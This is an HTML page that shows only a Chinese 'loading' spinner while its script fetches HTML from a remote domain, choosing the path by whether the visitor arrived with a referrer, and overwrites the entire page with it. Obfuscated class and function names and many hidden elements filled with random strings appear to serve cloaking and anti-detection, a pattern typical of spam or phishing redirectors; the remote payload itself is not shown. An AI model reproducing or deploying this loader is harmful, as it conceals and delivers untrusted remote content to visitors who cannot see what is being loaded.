<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .hWaK0ae {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .hWaK0ae .Q2UiNZhFOEz {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .hWaK0ae .content {
            line-height: 50px;
            text-align: center
        }

        .hWaK0ae .img {
            width: 100%
        }

        .hWaK0ae .dOdSGfKrhK {
            text-align: center
        }

        .hWaK0ae .dOdSGfKrhK span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .hWaK0ae .dOdSGfKrhK span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .hWaK0ae .dOdSGfKrhK span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .hWaK0ae .dOdSGfKrhK span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .hWaK0ae .dOdSGfKrhK span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .hWaK0ae .dOdSGfKrhK span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .hWaK0ae .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function ulnN69J2w(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var LKMsx = ulnN69J2w('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ LKMsx +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ LKMsx +".html?a=share";
		}
		
        dxkXX7NB=url+"#"+new Date().getTime();
        dxkXX7NB && function() {
            $.get(dxkXX7NB, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >SQBOvGddsBiR3L1B</b>
<li style='display:none' >oRN2EpdzNSaixj5UnTly37MOeWdckRDvbfzNfkub0mi5n8U</li>
<p  style='display:none'>TrWRX92efGNsaH4HK8vFtiS2viPJdbqBjAByfVexzkhtdyb94iOrTi7YYSInDePRo</p>
<h1 style='display:none' >zYGQlfqY36xRE8CozPKw7AM</h1>
<li style='display:none' >oRN2EpdzNSaixj5UnTly37MOeWdckRDvbfzNfkub0mi5n8U</li>
<b style='display:none' >SQBOvGddsBiR3L1B</b>
<p  style='display:none'>TrWRX92efGNsaH4HK8vFtiS2viPJdbqBjAByfVexzkhtdyb94iOrTi7YYSInDePRo</p>
<div style='display:none'>OFQyywOaakQ9zErbB6pj4q85wMfY17hmqA66ofstlzCl8JrDfa3rsoeZw9wvWvp2W1yqI8ANxAnT5ywMlC1dU6SgaBPcyePNyl</div>
<b style='display:none' >SQBOvGddsBiR3L1B</b><div class="hWaK0ae">
    <div class="Q2UiNZhFOEz">
        <div class="dOdSGfKrhK">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>pNlsEUfyPcz8AmH0lkirEaBrrSxbwMGg9qyZJNe9qMMqCRnLIpGKscwELwQsJ3u5rrYlLE</a>
<h1 style='display:none' >M6gEXmIL4zeWAFHJECcnjS0lHBswdpo8bxy1as4tIbEh0vkfoa0BjqYfRccfzc3YIJ8oATr8YuEdgb</h1>
<h1 style='display:none' >M6gEXmIL4zeWAFHJECcnjS0lHBswdpo8bxy1as4tIbEh0vkfoa0BjqYfRccfzc3YIJ8oATr8YuEdgb</h1>
<b style='display:none' >IYjqupshf4BHZ4A8JQc7LQOvW8brdEqYzx1flepUbBqvdPSXFwVDwLT6cZyxqQd7U4om29fV5Fy</b>
<ul style='display:none' >MxKt7wPl1ttV6ILxLX6IYpZVjCmmF6hlIwpS2AGj</ul>
<img  src='' style='display:none'>
<h1 style='display:none' >M6gEXmIL4zeWAFHJECcnjS0lHBswdpo8bxy1as4tIbEh0vkfoa0BjqYfRccfzc3YIJ8oATr8YuEdgb</h1>
<b style='display:none' >IYjqupshf4BHZ4A8JQc7LQOvW8brdEqYzx1flepUbBqvdPSXFwVDwLT6cZyxqQd7U4om29fV5Fy</b>
<ul style='display:none' >MxKt7wPl1ttV6ILxLX6IYpZVjCmmF6hlIwpS2AGj</ul>
<h1 style='display:none' >M6gEXmIL4zeWAFHJECcnjS0lHBswdpo8bxy1as4tIbEh0vkfoa0BjqYfRccfzc3YIJ8oATr8YuEdgb</h1></body>
</html>